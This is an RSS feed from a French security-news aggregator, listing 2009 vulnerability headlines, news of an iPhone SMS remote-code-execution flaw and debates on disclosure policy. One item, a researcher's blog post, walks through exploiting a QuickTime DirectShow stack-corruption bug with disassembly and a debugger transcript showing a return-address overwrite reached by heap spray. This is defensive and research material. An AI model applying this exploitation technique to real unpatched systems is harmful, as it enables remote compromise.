<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Observatoire de la securite Internet</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>Researchers Warn Of Critical iPhone Vulnerability</title><description>2009-07-03 20:50:16 - Packet Storm Security Headlines : </description><link>http://www.secuobs.com/revue/news/116818.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116818.shtml</guid></item>
<item><title>Apple patching critical SMS vulnerability in iPhone OS</title><description>2009-07-03 20:13:31 - Ars Technica  Security : companion photo for Apple patching critical SMS vulnerability in iPhone OSSecurity researcher Charlie Miller has revealed that Apple is workingon a patch for a security flaw he identified in the iPhone's SMSimplementation The flaw can actually lead to arbitrary codeexecution, as he explained to Ars last month Miller hasn't yetdetailed the flaw, citing an agreement with Apple, though he andpartner Vincenzo Iozzo plan to detail their discovery later this monthat the Black Hat Security Conference in Las VegasDuring a presentation at the SyScan security conference in Singapore,Miller explained that a vulnerability in the iPhone's handling of SMSmessages makes it possible to send code instead of strictly textDespite SMS's 140 byte size limitation, the iPhone can reassemblelarger messages that are broken up to fit the limitation, which allowslarger programs to be sent The iPhone can be instructed to executeSMS data as code instead of text, and when it executes the code itdoes so with root privileges and without any interaction from theuserClick here to read the rest of this articleIMAGEIMAGEIMAGE</description><link>http://www.secuobs.com/revue/news/116791.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116791.shtml</guid></item>
<item><title>Opial 10 albumid Remote SQL Injection Vulnerability</title><description>2009-07-03 02:36:44 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/116544.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116544.shtml</guid></item>
<item><title>iPhone hacker reveals SMS vulnerability </title><description>2009-07-03 01:48:59 - Latest articles from SC Magazine US : A security researcher on Thursday unveiled a new iPhone SMSvulnerability, according to reports out of the SyScan Conference inSingaporeIMAGEIMAGEIMAGE</description><link>http://www.secuobs.com/revue/news/116520.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116520.shtml</guid></item>
<item><title>Want vulnerability information Pony up the cash</title><description>2009-07-03 01:35:04 - SecuriTeam Blogs : The startup VoIPShield is changing its disclosure policy to stop givingout VoIP bugs for free and start charging vendors for it CEO RickDalmazzi writes: Avaya doesn’t “have to” pay us for anything We donot “require” payment from you It’s Avaya’s choice if you want toacquire the results of years of work by </description><link>http://www.secuobs.com/revue/news/116509.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116509.shtml</guid></item>
<item><title>Apple patching serious SMS vulnerability on iPhone</title><description>2009-07-02 23:00:57 - Network World on Security : Apple is working to fix an iPhone vulnerability that could allow anattacker to remotely install and run unsigned software code with rootaccess to the phone</description><link>http://www.secuobs.com/revue/news/116486.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116486.shtml</guid></item>
<item><title>SMS remote code execution vulnerability in iPhone</title><description>2009-07-02 22:52:08 - FSecure Antivirus Research Weblog :  Charlie Miller, a well-known security researcher who specializes in Macand iPhone security, yesterday revealed information about a newvulnerability in iPhone that allows remote code execution via SMS Nota lot is known about the vulnerability, which was announced at theSyScan conference in Singapore, except that Charlie is working withApple to get it fixed as soon as possibleIMAGEpicture from applecomThis is about as bad as it gets as the vulnerability seems to allowunsigned code to run which circumvents a core part of iPhone'ssecurity model as it's usually only able to run signed code, ie Appsthat have been approved by Apple No user-interaction required whichis unlike current mobile malware InfoWorld has the original storyherePS Im shift manager for one of our three daily response shifts thisweek and I'm tweeting about what were doing in the shift over athttp://twittercom/patrikrunaldOn 02/07/09 At 06:30 PM</description><link>http://www.secuobs.com/revue/news/116482.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116482.shtml</guid></item>
<item><title>AdminLog 05 valid_login Authentication Bypass Vulnerability</title><description>2009-07-02 22:19:35 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/116452.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116452.shtml</guid></item>
<item><title>Opial 10 Auth Bypass Remote SQL Injection Vulnerability</title><description>2009-07-02 22:19:35 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/116449.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116449.shtml</guid></item>
<item><title>Brainbenchcom Assessment Engine JavaScript Injection Vulnerability</title><description>2009-07-02 06:10:33 - sudosecure.net : First off let me say that writing this post was a very difficult decisionfor me to make, as I normally try to work with vendors, companies, andorganizations to fix issues like this one I am about to disclosewithout ever really disclosing them to the public, but in this case itjust never </description><link>http://www.secuobs.com/revue/news/116180.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116180.shtml</guid></item>
<item><title>Wired: ATM Vendor Halts Researchers Talk on Vulnerability An ATM vendor has succeeded in getting a security talk pulled from the upcoming Black Hat conference after a researcher announced he would dem</title><description>2009-07-02 01:14:15 - Rootsecure.net : Wired: ATM Vendor Halts Researchers Talk on Vulnerability "An ATM vendorhas succeeded in getting a security talk pulled from the upcomingBlack Hat conference after a researcher announced he would demonstratea vulnerability in the system"</description><link>http://www.secuobs.com/revue/news/116065.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116065.shtml</guid></item>
<item><title>Should vendors have to PAY a security research firm to receive detailed vulnerability disclosure</title><description>2009-07-02 00:09:03 - Voice of VOIPSA : This is a guest post from Andy Zmolek, Senior Manager, Security Planningand Strategy at Avaya, and past participant in VOIPSEC mailing listdiscussions and other VOIPSA activities Andy asked if I couldpublicize this because he believes it is a discussion which we in thesecurity community need to have Text by Andy Zmolek of </description><link>http://www.secuobs.com/revue/news/116030.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/116030.shtml</guid></item>
<item><title>Messages Library 20 Arbitrary Delete Message Vulnerability</title><description>2009-07-01 20:23:05 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115952.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115952.shtml</guid></item>
<item><title>Messages Library 20 Insecure Cookie Handling Vulnerability</title><description>2009-07-01 20:23:05 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115951.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115951.shtml</guid></item>
<item><title>Vulnerability Scanning and Clouds/SaaS/IaaS/PaaS</title><description>2009-07-01 05:04:53 - Security Bloggers Network : Here is a very fun post called “Vulnerability Scanning and Clouds: AnAttempt to Move the Dialog On…” I loved it so much, I will just quotemy favorite parts here with a few comments It starts like this: “Muchhas been said about public Ia</description><link>http://www.secuobs.com/revue/news/115655.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115655.shtml</guid></item>
<item><title>Messages Library 20 Arbitrary Administrator Account  Vulnerability</title><description>2009-07-01 01:19:01 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115542.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115542.shtml</guid></item>
<item><title>ATM Vendor Halts Researcher's Talk On Vulnerability</title><description>2009-06-30 21:20:26 - Packet Storm Security Headlines : </description><link>http://www.secuobs.com/revue/news/115449.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115449.shtml</guid></item>
<item><title>WordPress Plugin DM Albums 192 Remote File Disclosure Vulnerability</title><description>2009-06-30 21:15:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115446.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115446.shtml</guid></item>
<item><title>DM FileManager 394 Remote File Disclosure Vulnerability</title><description>2009-06-30 21:15:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115445.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115445.shtml</guid></item>
<item><title>Jax FormMailer 300 Remote File Inclusion Vulnerability</title><description>2009-06-30 21:15:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115443.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115443.shtml</guid></item>
<item><title>BIGACE CMS 26 cmd Local File Inclusion Vulnerability</title><description>2009-06-30 21:15:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115442.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115442.shtml</guid></item>
<item><title>phpMyBlockchecker 100055 Insecure Cookie Handling Vulnerability</title><description>2009-06-30 21:15:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115441.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115441.shtml</guid></item>
<item><title>WordPress Plugin Related Sites 21 Blind SQL Injection Vulnerability</title><description>2009-06-30 21:15:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115440.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115440.shtml</guid></item>
<item><title>MDPro Module CWGuestBook = 21 Remote SQL Injection Vulnerability</title><description>2009-06-30 21:15:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115438.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115438.shtml</guid></item>
<item><title>Exploiting MS Advisory 971778 - QuickTime DirectShow Vulnerability</title><description>2009-06-30 20:26:14 - DVLabs Blogs : Posted by Aaron PortnoyOn May 28th, 2009 Microsoft released MS Security Advisory 971778titled Vulnerability in Microsoft DirectShow Could Allow Remote CodeExecution This vulnerability should be considered high-risk as itallows for remote code execution through a browser using the WindowsMedia Player ActiveX control In this blog post I provide a brief walkthrough of details of this issue and touch upon how it can beexploited in a reliable fashionThis vulnerability manifests itself within the quartzdll modulelocated within the WindowsSystem32 directory This DLL is part ofMicrosoft's DirectShow multimedia framework and is responsible forparsing various media formats and handing data off to appropriateinstallable compressors and decompressors Frequently, vulnerabilitiesin media formats exist within these installable compressors seeTPTI-09-01 and TPTI-09-02 for recent examples, however, in this casethe problematic code is located within quartz itself It should benoted that Quicktime does NOT need to be installed for this issue tobe exposedPrior to Vista, DirectShow had support for parsing Apple's Quicktimeformat This support was built upon DirectShow's COM-basedarchitecture DirectShow defines the IFilter interface that is used toimplement filter graphs to render and perform miscellaneous operationson streams of media dataWhen attempting to open a media file, quartz loops through differentmedia types defined as AM_MEDIA_TYPE structures, essentially GUIDsand determines if the next node on the filter graph can handle theinput stream's media type, negotiated via objects called Pins seeMark Dowd and John McDonald's Media Frenzy presentationIn practice, the Pin negotiation can be seen in a debugging session asa series of calls similar to this:02d6f770 74837a7f quartzCBaseMSRFilter::NotifyInputConnected+0x5002d6f784 748340b2 quartzCBaseMSRInPin::CompleteConnect+0x3a02d6f79c 7483df8d quartzCBasePin::ReceiveConnection+0xc202d6f7bc 7483e7d7 quartzCBasePin::AttemptConnection+0x54loop here until a successful connection02d6f7e0 7483e36f quartzCBasePin::TryMediaTypes+0x6402d6f80c 7483e2f9 quartzCBasePin::AgreeMediaType+0x7302d6f824 7483e048 quartzCBasePin::Connect+0x55In the case of this QuickTime DirectShow issue, when provided with amalicious file quartz determines the media type can be handled by theCQT class We know that video data is handled in streams Taking alook at the symbols contained within quartz that contains referencesto CQT, we see another interesting class called CQTStream Below is alisting of the functions with symbols for this class:CQTStream::BuildMediaTypelong,CMediaType *CQTStream::CQTStreamushort *,long *,CQT *,ushort const *,intCQTStream::ConvertInternalToRT__int64CQTStream::ConvertRTToInternal__int64CQTStream::DecideBufferSizeIMemAllocator *,_AllocatorProperties *CQTStream::GetAvailable__int64 *,__int64 *CQTStream::GetDuration__int64 *CQTStream::GetEndOfChunklong,long,longCQTStream::GetMaxSampleSizevoidCQTStream::GetMediaTypeint,CMediaType *CQTStream::GetStreamLengthvoidCQTStream::GetStreamStartvoidCQTStream::IsFormatSupported_GUID const * constCQTStream::MapByteOffsetToSamplelong,long *CQTStream::MapSampleToChunklong,long *,long *,SampleToChunk * *CQTStream::MapSampleToTimelongCQTStream::MapTimeToSamplelong,long *CQTStream::OnActivevoidCQTStream::RecordStartAndStop__int64 *,__int64 *,double *,_GUID const * constCQTStream::RefTimeToSampleCRefTimeCQTStream::SampleToRefTimelongCQTStream::UseDownstreamAllocatorvoidCQTStream::`vector deleting destructor'uintCQTStream::~CQTStreamvoidWe can see that the only functions here that take a MediaType as anargument are the BuildMediaType and GetMediaType functions It's asafe bet to assume that they will be handling file data at arelatively lower level than some of the utility functions Quicklydisassembling GetMediaType shows that it is only 6 basic blocks anddoes nothing of interest to usDisassembling BuildMediaType shows more promise Firstly, aninteresting item to note, the presence of a stack cookie:text:748FB8B0 private: long __stdcall CQTStream::BuildMediaTypelong, class CMediaType * proc neartext:748FB8B0text:748FB8B0text:748FB8B0text:748FB8B0   mov     edi, editext:748FB8B2   push    ebptext:748FB8B3   mov     ebp, esptext:748FB8B5   sub     esp, 528htext:748FB8BB   mov     eax, ___security_cookietext:748FB8C0   mov     ebp+stackCookie, eaxIf a standard stack overflow were present in this function it might bea little bit more difficult to exploit However, as we'll see thisparticular DirectShow issue is a more unique stack corruptionvulnerability that will not be affected by the stack cookiemitigationA couple basic blocks into this function shows the first sign thatit's parsing file data:text:748FB8EC loc_748FB8EC:text:748FB8EC   mov     eax, ebx+1B8htext:748FB8F2   cmp     eax, 'ediv'text:748FB8F7   jz      loc_748FBA9Dtext:748FBA9D loc_748FBA9D:text:748FBA9D   push    22text:748FBA9F   pop     ecxtext:748FBAA0   lea     edi, ebp+var_6Ctext:748FBAA3   rep movsdThe 'vide' comparison here is a test for Apple's Quicktime imagecompression type Following the successful branch we arrive at basicblock that begins with a 22 byte seek, which, according to Apple'sfile format documentation, jumps over some extraneous structures andarrives at the very beginning of the ImageDescription 'stsd' atomThis is where the vulnerability begins to manifest Specifically, thenext couple instructions are responsible for parsing the 'name'element of an ImageDescription structure This field is a 32-characterPascal string, implemented as a 31 character string prefixed with a 1byte length value Herein lies the problem if this length byte islarger than 31 characters an attacker can fool the code within quartzinto writing a NULL byte beyond this string The code responsible forthis is shown below:text:748FBAA5   movsx   eax, ebp+pascalStrLen ; the string length prefix bytetext:748FBAA9   mov     ebp+eax+var_39, 0 ; attempted null terminateSo, this vulnerability allows a malicious media file to write a singleNULL byte within 255 bytes in one direction of the stack variablevar_39 Now comes the fun part, exploitation Below is a WinDBGtranscript demonstrating how this can be exploited:0:017 bp quartzCQTStream::BuildMediaType+0x1f5Bp expression 'quartzCQTStream::BuildMediaType+0x1f5' could not be resolved, adding deferred bp0:017 gCreate thread 17:338ModLoad: 76360000 76370000   C:WINDOWSsystem32winstadllModLoad: 74810000 7497d000   C:WINDOWSSystem32quartzdllModLoad: 75f40000 75f51000   C:WINDOWSSystem32devenumdllBreakpoint 0 hiteax=65646976 ebx=01192bf0 ecx=00000000 edx=00000000 esi=01192b8e edi=01b9f08ceip=748fbaa5 esp=01b9eb6c ebp=01b9f0a0 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246quartzCQTStream::BuildMediaType+0x1f5:748fbaa5 0fbe45c6        movsx   eax,byte ptr ebp-3Ah     ss:0023:01b9f066=40The above line is showing the single length byte that comes directlyfrom the file Now, here is the NULL byte write which is attempting toterminate the Pascal string The offset is stored in @eax and thus cancause the following memory write to seek past the string At thispoint we can check the call stack to determine a good location towrite the 0x00 byte This is a contrived example as I have alreadychosen a location that is 0x40 bytes away from ebp-0x39, but forcompleteness the call stack follows0:017 kChildEBP RetAddr01b9f0a0 748fc639 quartzCQTStream::BuildMediaType+0x1f501b9f154 748387f0 quartzCQT::CreateOutputPins+0x70501b9f770 74837a7f quartzCBaseMSRFilter::NotifyInputConnected+0x5001b9f784 748340b2 quartzCBaseMSRInPin::CompleteConnect+0x3a01b9f79c 7483df8d quartzCBasePin::ReceiveConnection+0xc201b9f7bc 7483e7d7 quartzCBasePin::AttemptConnection+0x5401b9f7e0 7483e36f quartzCBasePin::TryMediaTypes+0x6401b9f80c 7483e2f9 quartzCBasePin::AgreeMediaType+0x7301b9f824 7483e048 quartzCBasePin::Connect+0x55So, the quickest location to attempt an overwrite is the returnaddress within the stack frame at 0x01b9f0a0 The return address iscurrently 0x748fc639 By changing a single byte in this, we can causethe process to return to address space that can be reached via ajavascript heap fill in the context of a browser This makes for asimple exploit technique that can be made fairly reliable except ofcourse if we're dealing with a DEP-enabled process in which case amore advanced exploitation technique is required So, let's see whathappens when we overwrite a single byte of that return address0:017 teax=00000040 ebx=01192bf0 ecx=00000000 edx=00000000 esi=01192b8e edi=01b9f08ceip=748fbaa9 esp=01b9eb6c ebp=01b9f0a0 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246quartzCQTStream::BuildMediaType+0x1f9:748fbaa9 c64405c700      mov     byte ptr ebp+eax-39h,0   ss:0023:01b9f0a7=74Here is the before:0:017 dd 01b9f0a0 L201b9f0a0  01b9f154 748fc639After the NULL write:0:017 dd 01b9f0a0 L201b9f0a0  01b9f154 008fc639So, now if we let the process go at this point it will return to0x008fc639 which should not be mapped memory0:017 u 008fc639+0x8fc638:008fc639               ^ Memory access error in 'u 008fc639'0:017 g674f0: Access violation - code c0000005 first chanceFirst chance exceptions are reported before any exception handlingThis exception may be expected and handledeax=00000000 ebx=01173e38 ecx=0000930b edx=00090608 esi=01192bf0 edi=01192dd0eip=008fc639 esp=01b9f0b4 ebp=01b9f154 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246+0x8fc638:008fc639               0:018 address @eip008c0000 : 008c6000 - 000fa000Type     00020000 MEM_PRIVATEState    00002000 MEM_RESERVEUsage    RegionUsageHeapHandle   008c0000At this point it's game over, a heap spray can easily reach thisaddress However, exploit mitigation techniques such as DEP wouldprevent this method as the pages of memory would not have the executebit set and thus this would throw an access violation even if code waspresent at that address A more advanced exploit could use AlexanderSotirov and Mark Dowd's NET trick to overwrite a different portion ofthe return address and return to a loaded module controlled by theattacker, but that is out of the scope of this postOn a related note I just returned from Sao Paulo, Brazil where I spokeat the You Sh0t the Sheriff conference on the discovery andexploitation of vulnerabilities in 3rd party codecs as well as delvinginto the inner workings of DirectShow The slides should be uploadedto the DVLabs Appearances page next weekThe YSTS event was very informative and I will be writing a blog postsoon covering the presentations I had the pleasure of attending--AaronIMAGE</description><link>http://www.secuobs.com/revue/news/115376.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115376.shtml</guid></item>
<item><title>Almnzm COOKIE: customer Remote SQL Injection Vulnerability</title><description>2009-06-30 00:10:05 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115021.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115021.shtml</guid></item>
<item><title>PHP-Sugar 080 indexphp t Local File Inclusion Vulnerability</title><description>2009-06-30 00:10:05 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115020.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115020.shtml</guid></item>
<item><title>Joomla com_bookflip book_id Remote SQL Injection Vulnerability</title><description>2009-06-30 00:10:05 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115016.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115016.shtml</guid></item>
<item><title>Audio Article Directory file Remote File Disclosure Vulnerability</title><description>2009-06-30 00:10:05 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115015.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115015.shtml</guid></item>
<item><title>DM FileManager 394 Remote File Inclusion Vulnerability</title><description>2009-06-30 00:10:05 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/115012.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/115012.shtml</guid></item>
<item><title>WHOISCART Auth Bypass Information Disclosure Vulnerability</title><description>2009-06-29 19:47:43 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/114928.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114928.shtml</guid></item>
<item><title>Messages Library 20 catphp CatID SQL Injection Vulnerability</title><description>2009-06-29 19:47:43 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/114927.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114927.shtml</guid></item>
<item><title>Joomla Component com_php id Blind SQL Injection Vulnerability</title><description>2009-06-29 19:47:43 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/114926.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114926.shtml</guid></item>
<item><title>osTicket 16 RC4 Admin Login Blind SQL Injection Vulnerability</title><description>2009-06-29 19:47:43 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/114922.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114922.shtml</guid></item>
<item><title>Vulnerability Scanning and Clouds: An Attempt to Move the Dialog On…</title><description>2009-06-29 02:05:14 - Cloud Security : Much has been said about public IaaS providers that expressly forbidcustomers from running network scans against their cloud hostedinfrastructure Failure to comply with the Terms of Service can resultin account suspension or termination ouch This post is my attemptto suggest a way forward I welcome your feedback… As has been notedbefore, </description><link>http://www.secuobs.com/revue/news/114681.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114681.shtml</guid></item>
<item><title>*hot* Cisco Vulnerability Given ‘Write Once, Run Anywhere’ Treatement</title><description>2009-06-28 14:28:25 - Steve on Security : </description><link>http://www.secuobs.com/revue/news/114611.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114611.shtml</guid></item>
<item><title>Kaspersky Web Scanner ActiveX Format String Vulnerability</title><description>2009-06-28 14:27:26 - Harmony Security  Blog : </description><link>http://www.secuobs.com/revue/news/114596.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114596.shtml</guid></item>
<item><title>Microsoft DebugView Privilege Escalation Vulnerability</title><description>2009-06-28 14:27:26 - Harmony Security  Blog : </description><link>http://www.secuobs.com/revue/news/114594.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114594.shtml</guid></item>
<item><title>Novell NetWare Client Privilege Escalation Vulnerability</title><description>2009-06-28 14:27:26 - Harmony Security  Blog : </description><link>http://www.secuobs.com/revue/news/114593.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114593.shtml</guid></item>
<item><title>Novell ZENworks Endpoint Security Management Local Privilege Escalation Vulnerability</title><description>2009-06-28 14:27:26 - Harmony Security  Blog : </description><link>http://www.secuobs.com/revue/news/114591.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114591.shtml</guid></item>
<item><title>Motorola netOctopus Agent MSR Write Privilege Escalation Vulnerability</title><description>2009-06-28 14:27:26 - Harmony Security  Blog : </description><link>http://www.secuobs.com/revue/news/114590.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114590.shtml</guid></item>
<item><title>Novell NetWare Client nicmsys Local Privilege Escalation Vulnerability</title><description>2009-06-28 14:27:26 - Harmony Security  Blog : </description><link>http://www.secuobs.com/revue/news/114589.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114589.shtml</guid></item>
<item><title>VMware Tools HGFS Local Privilege Escalation Vulnerability</title><description>2009-06-28 14:27:26 - Harmony Security  Blog : </description><link>http://www.secuobs.com/revue/news/114585.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114585.shtml</guid></item>
<item><title>Microsoft Host Integration Server 2006 Command Execution Vulnerability</title><description>2009-06-28 14:27:26 - Harmony Security  Blog : </description><link>http://www.secuobs.com/revue/news/114582.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114582.shtml</guid></item>
<item><title>Mega File Manager 10 indexphp page LFI Vulnerability</title><description>2009-06-27 02:18:25 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/114330.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114330.shtml</guid></item>
<item><title>ForumPal FE 11 Auth Bypass Remote SQL Injection Vulnerability</title><description>2009-06-26 22:56:51 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/114262.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114262.shtml</guid></item>
<item><title>Motorola Timbuktu Pro PlughNTCommand Stack Based Buffer Overflow Vulnerability</title><description>2009-06-26 22:55:41 - iDefense Public Vulnerability Disclosures : </description><link>http://www.secuobs.com/revue/news/114261.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114261.shtml</guid></item>
<item><title>HP Network Node Manager rping Stack Buffer Overflow Vulnerability</title><description>2009-06-26 22:55:41 - iDefense Public Vulnerability Disclosures : </description><link>http://www.secuobs.com/revue/news/114260.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/114260.shtml</guid></item>
<item><title>MyFusion 6b settingslocale Local File Inclusion Vulnerability</title><description>2009-06-25 22:28:41 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113802.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113802.shtml</guid></item>
<item><title>AlumniServer 101 Auth Bypass SQL Injection Vulnerability</title><description>2009-06-25 22:28:41 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113801.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113801.shtml</guid></item>
<item><title>MD-Pro 1083x Survey Module pollID Blind SQL Injection Vulnerability</title><description>2009-06-25 22:28:41 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113799.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113799.shtml</guid></item>
<item><title> Adobe patches critical Shockwave Player vulnerability</title><description>2009-06-25 22:00:15 - Help Net Security  News : A critical vulnerability has been identified in Adobe Shockwave Player1150596 and earlier versions This vulnerability could allow anattacker who successfully exploits this vulnerability to take </description><link>http://www.secuobs.com/revue/news/113767.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113767.shtml</guid></item>
<item><title>Microsoft Internet Explorer Cookie Path Attribute Vulnerability</title><description>2009-06-25 17:57:50 - Kellep Charles Information Security  Blog Space : Microsoft Internet Explorer Cookie Path Attribute VulnerabilityDate of Discovery: 17112004Criticality: CriticalAffects: Microsoft Internet Explorer 6xCompromise From: From remoteCompromise Type: HijackingSummaryA vulnerability has been reported in Internet Explorer, whichpotentially can be exploited by malicious people to conduct sessionfixation attacksDetailed DescriptionA vulnerability has been reported in Internet Explorer, whichpotentially can be exploited by malicious people to conduct sessionfixation attacksThe vulnerability is caused due to a validation error in the handlingof the path attribute when accepting cookies This can potentially beexploited by a malicious website, if the trusted site supportswildcard domains or the domain name contains the malicious sitesdomain, using a specially crafted path attribute to overwrite cookiesfor the trusted siteThe vulnerability has been reported in Internet Explorer 60 SP1 onMicrosoft Windows XP SP1 Microsoft Windows XP SP2 is reportedly notaffectedNote: Successful exploitation also requires that the trusted sitehandles cookies and authentication in an inappropriate or insecuremannerSolutionUpdate to Windows XP SP2Disable cookies except when neededCVE ReferenceCVE-2004-1527IMAGE</description><link>http://www.secuobs.com/revue/news/113717.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113717.shtml</guid></item>
<item><title>Linux kernel minor signal vulnerability</title><description>2009-06-25 06:37:18 - Security : I recently came up with a little API abuse of the clone system callNot earth shattering, but definitely fun Essentially, you can sendany signal you want at any time to your parent process, even if it isrunning with real and effective user id of someone else eg rootFull technical details and an example may be found here:http://scarybeastsorg/security/CESA-2009-002htmlMaybe someone more devious that me can come up with better abusescenarios than I can Have at itSignals are a tricky area of the kernel on a lot of levels I find itinteresting that every slightly unusual way to send signals in thekernel has suffered from access control issues in the past Forexample, this COSEINC advisory notes issues in sending signals viaprctlPR_SET_PDEATHSIG,  There were multi-vendor issues withfcntl, F_SETOWN,  a long time ago which resurfaced in aLinux-specific manner a little afterIMAGE</description><link>http://www.secuobs.com/revue/news/113498.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113498.shtml</guid></item>
<item><title>Linux kernel minor seccomp vulnerability</title><description>2009-06-25 06:37:18 - Security : I just released some technical details on why and how "seccomp" isvulnerable to the Linux kernel syscall filtering problems that Ipreviously blogged about The full details may be found here:http://scarybeastsorg/security/CESA-2009-004htmlThe actual bug is of little significance because pretty much no-oneuses seccomp:This searches for the PR_SET_SECCOMP string on Google Code SearchIn addition, even if people did use this -- the bug is not a fullbreak out, just some leakage of filesystem names via stat ormischief via unrestricted chmodHowever, I still find this vulnerability interesting It's a soberingreminder that even a very simple security technology can havesurprising bugs seccomp applies extremely tight restrictions onuntrusted code, but within these constraints, the code still hasopportunities to misbehave And this isn't the only example Forreference, check out how a seccomp-constrained process couldhistorically cause trouble in the syscall tracing path with:CVE-2007-4573: trouble with the upper 32-bits of %rax not clearCVE-2008-1615: trouble calling syscalls with a bad value in the %csregisterCVE-2004-0001: trouble with EFLAGS, unknown triggerIMAGE</description><link>http://www.secuobs.com/revue/news/113497.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113497.shtml</guid></item>
<item><title>Cisco Physical Access Gateway Denial of Service Vulnerability</title><description>2009-06-24 21:49:52 - Cisco Security AdvisoriesSearch Cisco : IMAGE</description><link>http://www.secuobs.com/revue/news/113304.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113304.shtml</guid></item>
<item><title>BASE = 124 Auth Bypass Insecure Cookie Handling Vulnerability</title><description>2009-06-24 21:48:30 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113301.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113301.shtml</guid></item>
<item><title>Glossword = 1811 indexphp x Local File Inclusion Vulnerability</title><description>2009-06-24 21:48:30 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113300.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113300.shtml</guid></item>
